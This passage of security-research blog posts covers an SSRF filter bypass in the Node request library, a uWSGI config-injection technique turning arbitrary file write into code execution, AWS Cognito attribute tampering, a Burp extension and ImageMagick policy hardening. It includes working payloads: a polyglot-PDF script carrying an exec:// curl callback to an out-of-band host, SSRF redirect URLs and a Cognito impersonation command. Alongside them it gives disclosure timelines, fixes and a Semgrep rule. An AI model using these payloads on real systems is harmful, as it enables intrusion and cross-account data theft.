        if (result && (policy.AuditRedirectionTrust | policy.EnforceRedirectionTrust | policy.Flags)) {
            printf("%ws:\n", process.first.c_str());
            printf("\tAuditRedirectionTrust: % d\n\tEnforceRedirectionTrust : % d\n\tFlags : % d\n", policy.AuditRedirectionTrust, policy.EnforceRedirectionTrust, policy.Flags);
        }
    }
}

The Redirection Guard should prevent an entire class of junction attacks and might significantly complicate local privilege escalation attacks. While it addresses the previously mentioned issue, it also addresses other types of installer bugs, such as when a privileged installer moves files from user-controlled directories.

Microsoft Disclosure Timeline

Status Data
Vulnerability reported to Microsoft 9 Oct 2022
Vulnerability accepted 4 Nov 2022
Patch developed 10 Jan 2023
Patch released 14 Feb 2023

SSRF Cross Protocol Redirect Bypass

Server Side Request Forgery (SSRF) is a fairly known vulnerability with established prevention methods. So imagine my surprise when I bypassed an SSRF mitigation during a routine retest. Even worse, I have bypassed a filter that we have recommended ourselves! I couldn’t let it slip and had to get to the bottom of the issue.

Introduction

Server Side Request Forgery is a vulnerability in which a malicious actor exploits a victim server to perform HTTP(S) requests on the attacker’s behalf. Since the server usually has access to the internal network, this attack is useful to bypass firewalls and IP whitelists to access hosts otherwise inaccessible to the attacker.

Request Library Vulnerability

SSRF attacks can be prevented with address filtering, assuming there are no filter bypasses. One of the classic SSRF filtering bypass techniques is a redirection attack. In these attacks, an attacker sets up a malicious webserver serving an endpoint redirecting to an internal address. The victim server properly allows sending a request to an external server, but then blindly follows a malicious redirection to an internal service.

None of above is new, of course. All of these techniques have been around for years and any reputable anti-SSRF library mitigates such risks. And yet, I have bypassed it.

Client’s code was a simple endpoint created for integration. During the original engagement there was no filtering at all. After our test the client has applied an anti-SSRF library ssrfFilter. For the research and code anonymity purposes, I have extracted the logic to a standalone NodeJS script:

const request = require('request');
const ssrfFilter = require('ssrf-req-filter');

let url = process.argv[2];
console.log("Testing", url);

request({
    uri: url,
    agent: ssrfFilter(url),
}, function (error, response, body) {
    console.error('error:', error);
    console.log('statusCode:', response && response.statusCode);
});

To verify a redirect bypasss I have created a simple webserver with an open-redirect endpoint in PHP and hosted it on the Internet using my test domain tellico.fun:

<?php header('Location: '.$_GET["target"]); ?>

Initial test demonstrates that the vulnerability is fixed:

$ node test-request.js "http://tellico.fun/redirect.php?target=http://localhost/test" 
Testing http://tellico.fun/redirect.php?target=http://localhost/test
error: Error: Call to 127.0.0.1 is blocked.

But then, I switched the protocol and suddenly I was able to access a localhost service again. Readers should look carefully at the payload, as the difference is minimal:

$ node test-request.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
error: null
statusCode: 200

What happened? The attacker server has redirected the request to another protocol - from HTTPS to HTTP. This is all it took to bypass the anti-SSRF protection.

Why is that? After some digging in the popular request library codebase, I have discovered the following lines in the lib/redirect.js file:

  // handle the case where we change protocol from https to http or vice versa
if (request.uri.protocol !== uriPrev.protocol) {
  delete request.agent
}

According to the code above, anytime the redirect causes a protocol switch, the request agent is deleted. Without this workaround, the client would fail anytime a server would cause a cross-protocol redirect. This is needed since the native NodeJs http(s).agent cannot be used with both protocols.

Unfortunately, such behavior also loses any event handling associated with the agent. Given, that the SSRF prevention is based on the agents’ createConnection event handler, this unexpected behavior affects the effectiveness of SSRF mitigation strategies in the request library.

Disclosure

This issue was disclosed to the maintainers on December 5th, 2022. Despite our best attempts, we have not yet received an acknowledgment. After the 90-days mark, we have decided to publish the full technical details as well as a public Github issue linked to a pull request for the fix. On March 14th, 2023, a CVE ID has been assigned to this vulnerability.

  • 12/05/2022 - First disclosure to the maintainer
  • 01/18/2023 - Another attempt to contact the maintainer
  • 03/08/2023 - A Github issue creation, without the technical details
  • 03/13/2023 - CVE-2023-28155 assigned
  • 03/16/2023 - Full technical details disclosure

Other Libraries

Since supposedly universal filter turned out to be so dependent on the implementation of the HTTP(S) clients, it is natural to ask how other popular libraries handle these cases.

Node-Fetch

The node-Fetch library also allows to overwrite an HTTP(S) agent within its options, without specifying the protocol:

const ssrfFilter = require('ssrf-req-filter');
const fetch = (...args) => import('node-fetch').then(({ default: fetch }) => fetch(...args));

let url = process.argv[2];
console.log("Testing", url);

fetch(url, {
    agent: ssrfFilter(url)
}).then((response) => {
    console.log('Success');
}).catch(error => {
    console.log('${error.toString().split('\n')[0]}');
});

Contrary to the request library though, it simply fails in the case of a cross-protocol redirect:

$ node fetch.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
TypeError [ERR_INVALID_PROTOCOL]: Protocol "http:" not supported. Expected "https:"

It is therefore impossible to perform a similar attack on this library.

Axios

The axios library’s options allow to overwrite agents for both protocols separately. Therefore the following code is protected:

axios.get(url, {
    httpAgent: ssrfFilter("http://domain"),
    httpsAgent: ssrfFilter("https://domain")
})

Note: In Axios library, it is neccesary to hardcode the urls during the agent overwrite. Otherwise, one of the agents would be overwritten with an agent for a wrong protocol and the cross-protocol redirect would fail similarly to the node-fetch library.

Still, axios calls can be vulnerable. If one forgets to overwrite both agents, the cross-protocol redirect can bypass the filter:

axios.get(url, {
    // httpAgent: ssrfFilter(url),
    httpsAgent: ssrfFilter(url)
})

Such misconfigurations can be easily missed, so we have created a Semgrep rule that catches similar patterns in JavaScript code:

rules:
  - id: axios-only-one-agent-set
    message: Detected an Axios call that overwrites only one HTTP(S) agent. It can lead to a bypass of restriction implemented in the agent implementation. For example SSRF protection can be bypassed by a malicious server redirecting the client from HTTPS to HTTP (or the other way around).
    mode: taint
    pattern-sources:
      - patterns:
        - pattern-either:
            - pattern: |
                {..., httpsAgent:..., ...}
            - pattern: |
                {..., httpAgent:..., ...}
        - pattern-not: |
                {...,httpAgent:...,httpsAgent:...}
    pattern-sinks:
      - pattern: $AXIOS.request(...)
      - pattern: $AXIOS.get(...)
      - pattern: $AXIOS.delete(...)
      - pattern: $AXIOS.head(...)
      - pattern: $AXIOS.options(...)
      - pattern: $AXIOS.post(...)
      - pattern: $AXIOS.put(...)
      - pattern: $AXIOS.patch(...)
    languages:
      - javascript
      - typescript
    severity: WARNING

Summary

As discussed above, we have discovered an exploitable SSRF vulnerability in the popular request library. Despite the fact that this package has been deprecated, this dependency is still used by over 50k projects with over 18M downloads per week.

We demonstrated how an attacker can bypass any anti-SSRF mechanisms injected into this library by simply redirecting the request to another protocol (e.g. HTTP to HTTPS). While many libraries we reviewed did provide protection from such attacks, others such as axios could be potentially vulnerable when similar misconfigurations exist. In an effort to make these issues easier to find and avoid, we have also released our internal Semgrep rule.

A New Vector For β€œDirty” Arbitrary File Write to RCE

pesdExporter

Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:

  • Control of the full file path or of the file name only: In this scenario, the attacker has the ability to control the full file path or the name of the uploaded file, but not its contents. Depending on the permissions applied to the target directory and on the target application, the impact may vary from Denial of Service to interfering with the application logic to bypass potential security-sensitive features.
  • Control of the file contents only: an attacker has control over the contents of the uploaded file but not over the file path. The impact can vary greatly in this case, due to numerous factors.
  • Full Arbitrary File Write: an attacker has control over both of the above. This often results in RCE using various methods.

A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):

  • Overwriting or adding files that will be processed by the application server:
    • Configuration files (e.g., .htaccess, .config, web.config, httpd.conf, __init__.py and .xml)
    • Source files being served from the root of the application (e.g., .php, .asp, .jsp files)
    • Temp files
    • Secrets or environmental files (e.g., venv)
    • Serialized session files
  • Manipulating procfs to execute arbitrary code
  • Overwriting or adding files used or invoked by the OS, or by other daemons in the system:
    • Crontab routines
    • Bash scripts
    • .bashrc, .bash-profile and .profile
    • authorized_keys and authorized_keys2 - to gain SSH access
    • Abusing supervisors’ eager reloading of assets

It’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.

The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (β€œdirty write”) or when server-side transformations are performed on its contents.

An example of a β€œdirty” arbitrary file write

In our scenario, the application had a vulnerable endpoint, through which, an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for:

  1. Reading an existing PDF template file and its stream
  2. Combining the PDF template and the new attacker-provided contents
  3. Saving the results in a PDF file named by the attacker

The attack was limited since it could only impact the files with the correct permissions for the application user, with all of the application files being read-only. While an attacker could already use the vulnerability to first delete the logs or on-file databases, no higher impact was possible at first glance. By looking at the directory, the following file was also available:

    drwxrwxr-x  6 root   root     4096 Nov 18 13:48 .
    -rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini

uWSGI Lax Parsing of Configuration Files

The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, supporting loading configuration files via simple disk files (.ini). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128 . The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (β€œ[uwsgi]”):

	while (len) {
		ini_line = ini_get_line(ini, len);
		if (ini_line == NULL) {
			break;
		}
		lines++;

		// skip empty line
		key = ini_lstrip(ini);
		ini_rstrip(key);
		if (key[0] != 0) {
			if (key[0] == '[') {
				section = key + 1;
				section[strlen(section) - 1] = 0;
			}
			else if (key[0] == ';' || key[0] == '#') {
				// this is a comment
			}
			else {
				// val is always valid, but (obviously) can be ignored
				val = ini_get_key(key);

				if (!strcmp(section, section_asked)) {
					got_section = 1;
					ini_rstrip(key);
					val = ini_lstrip(val);
					ini_rstrip(val);
					add_exported_option((char *) key, val, 0);
				}
			}
		}

		len -= (ini_line - ini);
		ini += (ini_line - ini);

	}

More importantly, uWSGI configuration files can also include β€œmagic” variables, placeholders and operators defined with a precise syntax. The β€˜@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including β€œexec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:

    [uwsgi]
    ; read from a symbol
    foo = @(sym://uwsgi_funny_function)
    ; read from binary appended data
    bar = @(data://0)
    ; read from http
    test = @(http://doyensec.com/hello)
    ; read from a file descriptor
    content = @(fd://3)
    ; read from a process stdout
    body = @(exec://whoami)
    ; call a function returning a char *
    characters = @(call://uwsgi_func)

uWSGI Auto Reload Configuration

While abusing the above .ini files is a good vector, an attacker would still need a way to reload it (such as triggering a restart of the service via a second DoS bug or waiting the server to restart). In order to help with this, a standard uWSGI deployment configuration flag could ease the exploitation of the bug. In certain cases, the uWSGI configuration can specify a py-auto-reload development option, for which the Python modules are monitored within a user-determined time span (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:

    [uwsgi]
    home = /app
    uid = webapp
    gid = webapp
    chdir = /app/console
    socket = 127.0.0.1:8001
    wsgi-file = /app/console/uwsgi-sockets.py
    gevent = 500
    logto = /var/log/uwsgi/%n.log
    harakiri = 30
    vacuum = True
    py-auto-reload = 3
    callable = app
    pidfile = /var/run/uwsgi-sockets-console.pid
    log-maxsize = 100000000
    log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak

In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py file with any data will trigger the uWSGI configuration file to be reloaded.

Putting it all together

In our PDF-exporting scenario, we had to craft a polymorphic, syntactically valid PDF file containing our valid multi-lined .ini configuration file. The .ini payload had to be kept during the merging with the PDF template. We were able to embed the multiline .ini payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:

    from fpdf import FPDF
    from exiftool import ExifToolHelper

    with ExifToolHelper() as et:
        et.set_tags(
            ["doyensec.jpg"],
            tags={"model": "&#x0a;[uwsgi]&#x0a;foo = @(exec://curl http://collaborator-unique-host.oastify.com)&#x0a;"},
            params=["-E", "-overwrite_original"]
        )

    class MyFPDF(FPDF):
        pass

    pdf = MyFPDF()

    pdf.add_page()
    pdf.image('./doyensec.jpg')
    pdf.output('payload.pdf', 'F')

This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl payload. The payload can be tested locally with the following command:

    uwsgi --ini payload.pdf

Let’s exploit it on the web server with the following steps:

  1. Upload payload.pdf into /app/console/uwsgi-sockets.ini
  2. Wait for server to restart or force the uWSGI reload by overwriting any .py
  3. Verify the callback made by curl on Burp collaborator

Conclusions

As highlighted in this article, we introduced a new uWSGI-based technique. It comes in addition to the tactics already used in various scenarios by attackers to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques are constantly evolving with the server technologies, and new methods will surely be popularized in the future. This is why it is important to share the known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular vectors.

Introducing Proxy Enriched Sequence Diagrams (PESD)

PESD Exporter is now public!

We are releasing an internal tool to speed-up testing and reporting efforts in complex functional flows. We’re excited to announce that PESD Exporter is nowΒ available on Github.

pesdExporter

Modern web platforms design involves integrations with other applications and cloud services to add functionalities, share data and enrich the user experience. The resulting functional flows are characterized by multiple state-changing steps with complex trust boundaries and responsibility separation among the involved actors.

In such situations, web security specialists have to manually model sequence diagrams if they want to support their analysis with visualizations of the whole functionality logic.

We all know that constructing sequence diagrams by hand is tedious, error-prone, time-consuming and sometimes even impractical (dealing with more than ten messages in a single flow).

Proxy Enriched Sequence Diagrams (PESD) is our internal Burp Suite extension to visualize web traffic in a way that facilitates the analysis and reporting in scenarios with complex functional flows.

Meet The Format

A Proxy Enriched Sequence Diagram (PESD) is a specific message syntax for sequence diagram models adapted to bring enriched information about the represented HTTP traffic. The MermaidJS sequence diagram syntax is used to render the final diagram.

While classic sequence diagrams for software engineering are meant for an abstract visualization and all the information is carried by the diagram itself. PESD is designed to include granular information related to the underlying HTTP traffic being represented in the form of metadata.

The Enriched part in the format name originates from the diagram-metadata linkability. In fact, the HTTP events in the diagram are marked with flags that can be used to access the specific information from the metadata.

As an example, URL query parameters will be found in the arrow events as UrlParams expandable with a click.

pesdExporter

Some key characteristics of the format :

  • visual-analysis, especially useful for complex application flows in multi-actor scenarios where the listed proxy-view is not suited to visualize the abstract logic
  • tester-specific syntax to facilitate the analysis and overall readability
  • parsed metadata from the web traffic to enable further automation of the analysis
  • usable for reporting purposes like documentation of current implementations or Proof Of Concept diagrams

PESD Exporter - Burp Suite Extension

The extension handles Burp Suite traffic conversion to the PESD format and offers the possibility of executing templates that will enrich the resulting exports.

pesdExporter

Once loaded, sending items to the extension will directly result in a export with all the active settings.

Currently, two modes of operation are supported:

  • Domains as Actors - Each domain involved in the traffic is represented as an actor in the diagram. Suitable for multi-domain flows analysis

pesdExporter
  • Endpoints as Actors - Each endpoint (path) involved in the traffic is represented as an actor in the diagram. Suitable for single-domain flows analysis

pesdExporter

Export Capabilities

  • Expandable Metadata. Underlined flags can be clicked to show the underlying metadata from the traffic in a scrollable popover

  • Masked Randoms in URL Paths. UUIDs and pseudorandom strings recognized inside path segments are mapped to variable namesΒ <UUID_N>Β /Β <VAR_N>. The re-renderization will reshape the diagram to improve flow readability. Every occurrence with the same value maintains the same name

  • Notes. Comments from Burp Suite are converted to notes in the resulting diagram. Use <br> in Burp Suite comments to obtain multi-line notes in PESD exports

  • Save as :

    • Sequence Diagram in SVG format
    • Markdown file (MermaidJS syntax),
    • Traffic metadata in JSON format. Read about the metadata structure in the format definition page,Β β€œexports section”

Extending the diagram, syntax and metadata with Templates

PESD Exporter supports syntax and metadata extension via templates execution. Currently supported templates are:

  • OAuth2 / OpenID ConnectΒ The template matches standard OAuth2/OpenID Connect flows and adds related flags + flow frame

  • SAML SSO The template matches Single-Sign-On flows with SAML V2.0 and adds related flags + flow frame

Template matching example for SAML SP-initiated SSO with redirect POST:

pesdExporter

The template engine is also ensuring consistency in the case of crossing flows and bad implementations. The current check prevents nested flow-frames since they cannot be found in real-case scenarios. Nested or unclosed frames inside the resulting markdown are deleted and merged to allow MermaidJS renderization.

Note: Whenever the flow-frame is not displayed during an export involving the supported frameworks, a manual review is highly recommended. This behavior should be considered as a warning that the application is using a non-standard implementation.

Do you want to contribute by writing you own templates? Follow the template implementation guide.

Why PESD?

During Test Planning and Auditing

PESD exports allow visualizing the entirety of complex functionalities while still being able to access the core parts of its underlying logic. The role of each actor can be easily derived and used to build a test plan before diving in Burp Suite.

It can also be used to spot the differences with standard frameworks thanks to the HTTP messages syntax along with OAuth2/OpenID and SAML SSO templates.

In particular, templates enable the tester to identify uncommon implementations by matching standard flows in the resulting diagram. By doing so, custom variations can be spotted with a glance.

The following detailed examples are extracted from our testing activities:

  • SAML Response Double Spending. The SAML Response was sent two times and one of the submissions happened out of the flow frame

pesdExporter
  • OIDC with subsequent OAuth2. In this case, CLIENT.com was the SP in the first flow with Microsoft (OIDC), then it was the IdP in the second flow (OAuth2) with the tenant subdomain.

pesdExporter

During Reporting

The major benefit from the research output was the conjunction of the diagrams generated with PESD with the analysis of the vulnerability. The inclusion of PoC-specific exports in reports allows to describe the issue in a straightforward way.

The export enables the tester to refer to a request in the flow by specifying its ID in the diagram and link it in the description. The vulnerability description can be adapted to different testing approaches:

  • Black Box Testing - The description can refer to the interested sequence numbers in the flow along with the observed behavior and flaws;

  • White Box Testing - The description can refer directly to the endpoint’s handling function identified in the codebase. This result is particularly useful to help the reader in linking the code snippets with their position within the entire flow.

In that sense, PESD can positively affect the reporting style for vulnerabilities in complex functional flows.

The following basic example is extracted from one of our client engagements.

Report Example - Arbitrary User Access Via Unauthenticated Internal API Endpoint

An internal (Intranet) Web Application used by the super-admins allowed privileged users within the application to obtain temporary access to customers’ accounts in the web facing platform.

In order to restrict the access to the customers’ data, the support access must be granted by the tenant admin in the web-facing platform. In this way, the admins of the internal application had user access only to organizations via a valid grant.

The following sequence diagram represents the traffic intercepted during a user impersonation access in the internal application:

pesdExporter

The handling function of the first request (1) checked the presence of an access grant for the requested user’s tenant. If there were valid grants, it returned the redirection URL for an internal API defined in AWS’s API Gateway. The API was exposed only within the internal network accessible via VPN.

The second request (3) pointed to the AWS’s API Gateway. The endpoint was handled with an AWS Lambda function taking as input the URL parameters containing : tenantId, user_id, and others. The returned output contained the authentication details for the requested impersonation session: access_token, refresh_token and user_id. It should be noted that the internal API Gateway endpoint did not enforce authentication and authorization of the caller.

In the third request (5), the authentication details obtained are submitted to the web-facing.platform.com and the session is set. After this step, the internal admin user is authenticated in the web-facing platform as the specified target user.

Within the described flow, the authentication and authorization checks (handling of request 1) were decoupled from the actual creation of the impersonated session (handling of request 3).

As a result, any employee with access to the internal network (VPN) was able to invoke the internal AWS API responsible for issuing impersonated sessions and obtain access to any user in the web facing platform. By doing so, the need of a valid super-admin access to the internal application (authentication) and a specific target-user access grant (authorization) were bypassed.

Stay tuned!

Updates are coming. We are looking forward to receiving new improvement ideas to enrich PESD even further.

Feel free to contribute with pull requests, bug reports or enhancements.

This project was made with love in the Doyensec Research island by Francesco Lacerenza . The extension was developed during his internship with 50% research time.

Tampering User Attributes In AWS Cognito User Pools

CloudsecTidbit

From The Previous Episode… Did you solve the CloudSecTidbit Ep. 1 IaC lab?

Solution

The challenge for the data-import CloudSecTidbit is basically reading the content of an internal bucket. The frontend web application is using the targeted bucket to store the logo of the app.

The name of the bucket is returned to the client by calling the /variable endpoint:

$.ajax({
    type: 'GET',
    url: '/variable',
    dataType: 'json',
    success: function (data) {
        let source_internal = `https://${data}.s3.amazonaws.com/public-stuff/logo.png?${Math.random()}`;
        $(".logo_image").attr("src", source_internal);
    },
    error: function (jqXHR, status, err) {
        alert("Error getting variable name");
    }
});

The server will return something like:

"data-internal-private-20220705153355922300000001"

So the schema should be clear now. Let’s use the data import functionality and try to leak the content of the data-internal-private S3 bucket:

Extracting data from the internal S3 bucket

Then, by visiting the Data Gallery section, you will see the keys.txt and dummy.txt objects, which are stored within the internal bucket.

Tidbit No. 2 - Tampering User Attributes In AWS Cognito User Pools

Amazon Web Services offer a complete solution to add user sign-up, sign-in, and access control to web and mobile applications: Cognito. Let’s first talk about the service in general terms.

From AWS Cognito’s welcome page:

β€œUsing the Amazon Cognito user pools API, you can create a user pool to manage directories and users. You can authenticate a user to obtain tokens related to user identity and access policies.”

Amazon Cognito collects a user’s profile attributes into directories called pools that an application uses to handle all authentication related tasks.

Pool Types

The two main components of Amazon Cognito are:

  • User pools: Provide sign-up and sign-in options for app users along with attributes association for each user.
  • Identity pools: Provide the possibility to grant users access to other AWS services (e.g., DynamoDB or Amazon S3).

With a user pool, users can sign in to an app through Amazon Cognito, OAuth2, and SAML identity providers.

Each user has a profile that applications can access through the software development kit (SDK).

User Attributes

User attributes are pieces of information stored to characterize individual users, such as name, email address, and phone number. A new user pool has a set of default standard attributes. It is also possible to add custom attributes to satisfy custom needs.

App Clients & Authentication

An app is an entity within a user pool that has permission to call management operation APIs, such as those used for user registration, sign-in, and forgotten passwords.

In order to call the operation APIs, an app client ID and an optional client secret are needed. Multiple app integrations can be created for a single user pool, but typically, an app client corresponds to the platform of an app.

A user can be authenticated in different ways using Cognito, but the main options are:

  • Client-side authentication flow - Used in client-side apps to obtain a valid session token (JWT) directly from the pool;
  • Server-side authentication flow - Used in server-side app with the authenticated server-side API for Amazon Cognito user pools. The server-side app calls the AdminInitiateAuth API operation. This operation requires AWS credentials with permissions that include cognito-idp:AdminInitiateAuth and cognito-idp:AdminRespondToAuthChallenge. The operation returns the required authentication parameters.

In both the cases, the end-user should receive the resulting JSON Web Token.

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Unrestricted User Attributes Write in AWS Cognito User Pool - The Third-party Users Mapping Case

For this case, we will focus on a vulnerability identified in a Web Platform that was using AWS Cognito.

The platform used Cognito to manage users and map them to their account in a third-party platform X_platform strictly interconnected with the provided service.

In particular, users were able to connect their X_platform account and allow the platform to fetch their data in X_platform for later use.

{
  "sub": "cf9..[REDACTED]",
  "device_key": "us-east-1_ab..[REDACTED]",
  "iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_..[REDACTED]",
  "client_id": "9..[REDACTED]",
  "origin_jti": "ab..[REDACTED]",
  "event_id": "d..[REDACTED]",
  "token_use": "access",
  "scope": "aws.cognito.signin.user.admin",
  "auth_time": [REDACTED],
  "exp": [REDACTED],
  "iat": [REDACTED],
  "jti": "3b..[REDACTED]",
  "username": "[REDACTED]"
}

In AWS Cognito, user tokens permit calls to all the User Pool APIs that can be hit using access tokens alone.

The permitted API definitions can be found here.

If the request syntax for the API call includes the parameter "AccessToken": "string", then it allows users to modify something on their own UserPool entry with the previously inspected JWT.

The above described design does not represent a vulnerability on its own, but having users able to edit their own User Attributes in the pool could lead to severe impacts if the backend is using them to apply internal platform logic.

The user associated data within the pool was fetched by using the AWS CLI:

$ aws cognito-idp get-user --region us-east-1--access-token eyJra..[REDACTED SESSION JWT]
{
    "Username": "[REDACTED]",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "cf915…[REDACTED]"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "[REDACTED]"
        },
        {
            "Name": "custom:X_platform_user_id",
            "Value": "[REDACTED ID]"
        },
        {
            "Name": "email",
            "Value": "[REDACTED]"
        }
    ]
}

The Simple Deduction

After finding the X_platform_user_id user pool attribute, it was clear that it was there for a specific purpose. In fact, the platform was fetching the attribute to use it as the primary key to query the associated refresh_token in an internal database.

Attempting to spoof the attribute was as simple as executing:

$ aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:X_platform_user_id,Value=[ANOTHER REDACTED ID]" --access-token eyJra..[REDACTED SESSION JWT]

The attribute edit succeeded and the data from the other user started to flow into the attacker’s account. The platform trusted the attribute as immutable and used it to retrieve a refresh_token needed to fetch and show data from X_platform in the UI.

Point Of The Story - Default READ/WRITE Perms On User Attributes

In AWS Cognito, App Integrations (Clients) have default read/write permissions on User Attributes.

The following image shows the β€œAttribute read and write permissions” configuration for a new App Integration within a User Pool.

Consequently, authenticated users are able to edit their own attributes by using the access token (JWT) and AWS CLI.

In conclusion, it is very important to know about such behavior and set the permissions correctly during the pool creation. Depending on the platform logic, some attributes should be set as read-only to make them trustable by internal flows.

For cloud security auditors

While auditing cloud-driven web platforms, look for JWTs issued by AWS Cognito, then answer the following questions:

  • Which User Attributes are associated with the user pool?
  • Which ones are editable with the JWT directly via AWS CLI?
    • Among the editable ones, is the platform trusting such claims?
      • For what internal logic or functional flow?
      • How does editing affect the business logic?

For developers

Remove write permissions for every platform-critical user attribute within App Integration for the used Users Pool (AWS Cognito).

By removing it, users will not be able to perform attribute updates using their access tokens.

Updates will be possible only via admin actions such as the admin-update-user-attributes method, which requires AWS credentials.

+1 remediation tip: To avoid doing it by hand, apply the r/w config in your IaC and have the infrastructure correctly deployed. Terraform example:

resource "aws_cognito_user_pool" "my_pool" {
  name = "my_pool"
}

...

resource "aws_cognito_user_pool" "pool" {
  name = "pool"
}

resource "aws_cognito_user_pool_client" "client" {
  name = "client"

  user_pool_id = aws_cognito_user_pool.pool.id
  read_attributes = ["email"]
  write_attributes = ["email"]
}

The given Terraform example file will create a pool where the client will have only read/write permissions on the β€œemail” attribute. In fact, if at least one attribute is specified either in the read_attributes or write_attributes lists, the default r/w policy will be ignored.

By doing so, it is possible to strictly specify the attributes with read/write permissions while implicitly denying them on the non-specified ones.

Please ensure to properly handle the email and phone number verification in Cognito context. Since they may contain unverified values, remember to apply the RequireAttributesVerifiedBeforeUpdate parameter.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!

Resources

ImageMagick Security Policy Evaluator

During our audits we occasionally stumble across ImageMagick security policy configuration files (policy.xml), useful for limiting the default behavior and the resources consumed by the library. In the wild, these files often contain a plethora of recommendations cargo cultured from around the internet. This normally happens for two reasons:

  • Its options are only generally described on the online documentation page of the library, with no clear breakdown of what each security directive allowed by the policy is regulating. While the architectural complexity and the granularity of options definable by the policy are the major obstacles for a newbie, the corresponding knowledge base could be more welcoming. By default, ImageMagick comes with an unrestricted policy that must be tuned by the developers depending on their use. According to the docs, β€œthis affords maximum utility for ImageMagick installations that run in a sandboxed environment, perhaps in a Docker instance, or behind a firewall where security risks are greatly diminished as compared to a public website.” A secure strict policy is also made available, however as noted in the past not always is well configured.
  • ImageMagick supports over 100 major file formats (not including sub-formats) types of image formats. The infamous vulnerabilities affecting the library over the years produced a number of urgent security fixes and workarounds involving the addition of policy items excluding the affected formats and features (ImageTragick in 2016, @taviso’s RCE via GhostScript in 2018, @insertScript’s shell injection via PDF password in 2020, @alexisdanizan’s in 2021).

Towards safer policies

With this in mind, we decided to study the effects of all the options accepted by ImageMagick’s security policy parser and write a tool to assist both the developers and the security teams in designing and auditing these files. Because of the number of available options and the need to explicitly deny all insecure settings, this is usually a manual task, which may not identify subtle bypasses which undermine the strength of a policy. It’s also easy to set policies that appear to work, but offer no real security benefit. The tool’s checks are based on our research aimed at helping developers to harden their policies and improve the security of their applications, to make sure policies provide a meaningful security benefit and cannot be subverted by attackers.

The tool can be found at imagemagick-secevaluator.doyensec.com/.

Allowlist vs Denylist approach

A number of seemingly secure policies can be found online, specifying a list of insecure coders similar to:

  ...
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="EPI" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="XPS" />
  ...

In ImageMagick 6.9.7-7, an unlisted change was pushed. The policy parser changed behavior from disallowing the use of a coder if there was at least one none-permission rule in the policy to respecting the last matching rule in the policy for the coder. This means that it is possible to adopt an allowlist approach in modern policies, first denying all coders rights and enabling the vetted ones. A more secure policy would specify:

  ...
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" />
  <policy domain="coder" rights="read | write" pattern="{GIF,JPEG,PNG,WEBP}" />
  ...

Case sensitivity

Consider the following directive:

  ...
  <policy domain="coder" rights="none" pattern="ephemeral,epi,eps,msl,mvg,pdf,plt,ps,ps2,ps3,show,text,win,xps" />
  ...

With this, conversions will still be allowed, since policy patterns are case sensitive. Coders and modules must always be upper-case in the policy (e.g. β€œEPS” not β€œeps”).

Resource limits

Denial of service in ImageMagick is quite easy to achieve. To get a fresh set of payloads it’s convenient to search β€œoom” or similar keywords in the recently opened issues reported on the Github repository of the library. This is an issue since an ImageMagick instance accepting potentially malicious inputs (which is often the case) will always be prone to be exploited. Because of this, the tool also reports if reasonable limits are not explicitly set by the policy.

Policy fragmentation

Once a policy is defined, it’s important to make sure that the policy file is taking effect. ImageMagick packages bundled with the distribution or installed as dependencies through multiple package managers may specify different policies that interfere with each other. A quick find on your local machine will identify multiple occurrences of policy.xml files:

$ find / -iname policy.xml

# Example output on macOS
